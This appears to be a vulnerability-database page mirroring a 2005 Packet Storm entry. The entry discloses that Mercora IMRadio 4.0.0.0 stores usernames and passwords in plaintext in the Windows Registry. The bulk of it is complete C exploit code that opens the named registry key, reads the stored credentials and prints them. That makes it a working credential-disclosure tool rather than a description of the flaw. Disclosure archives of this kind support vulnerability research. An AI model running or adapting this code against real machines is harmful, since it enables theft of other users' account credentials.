Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IMRadio-4.0-expl.txt

🗓️ 24 Aug 2005 00:00:00Reported by KozanType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Mercora IMRadio 4.0.0.0 stores passwords in plaintext in the Windows Registry. No fix available.

Code
`/*================================================================  
  
Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan  
  
Discovered & Coded by: Kozan  
Credits to ATmaCA  
Web: www.spyinstructors.com  
Mail: [email protected]  
  
=====[ Application ]==============================================  
  
Application: Mercora IMRadio 4.0.0.0 (and probably prior versions)  
Vendor: www.mercora.com  
  
=====[ Introduction ]=============================================  
  
Search, listen, and record any music. With over 2.5 million unique  
tracks, Mercora is a legal music radio network powered by people,  
DJs, and artists just like you. Mercora combines Internet streaming,  
country-specific copyright compliance, and social networking  
technologies to create the next generation of digital music.  
Version 4.0 supports friends and family listening, a vastly  
simplified interface, customized listening, and live music search.  
  
=====[ Bug ]======================================================  
  
Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows  
Registry in plain text. A local user can read the values.  
  
HKEY_CURRENT_USER\Software\Mercora\MercoraClient\Profiles  
Auto.Username = Mercora IMRadio Username  
Auto.Password = Mercora IMRadio Password  
  
=====[ Vendor Confirmed ]=========================================  
  
No  
  
=====[ Fix ]======================================================  
  
There is no solution at the time of this entry.  
  
================================================================*/  
  
#include <stdio.h>  
#include <windows.h>  
#define BUF 100  
  
int main()  
{  
HKEY hKey;  
char Username[BUF], Password[BUF];  
DWORD dwBUFLEN = BUF;  
LONG lRet;  
  
if( RegOpenKeyEx(HKEY_CURRENT_USER,  
"Software\\Mercora\\MercoraClient\\Profiles",  
0,  
KEY_QUERY_VALUE,  
&hKey  
) == ERROR_SUCCESS )  
{  
lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, (LPBYTE)Password, &dwBUFLEN);  
if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Password,"Not Found!");  
  
lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, (LPBYTE)Username, &dwBUFLEN);  
if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Username,"Not Found!");  
  
RegCloseKey(hKey);  
  
fprintf(stdout, "Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan\n");  
fprintf(stdout, "Credits to ATmaCA\n");  
fprintf(stdout, "www.spyinstructors.com \n");  
fprintf(stdout, "[email protected]\n\n");  
fprintf(stdout, "Username :\t%s\n",Username);  
fprintf(stdout, "Password :\t%s\n",Password);  
}  
else  
{  
fprintf(stderr, "Mercora IMRadio 4.0.0.0 is not installed on your system!\n");  
}  
  
return 0;  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
mercora imradiopassword disclosurelocal exploitwindows registryplaintext storage
30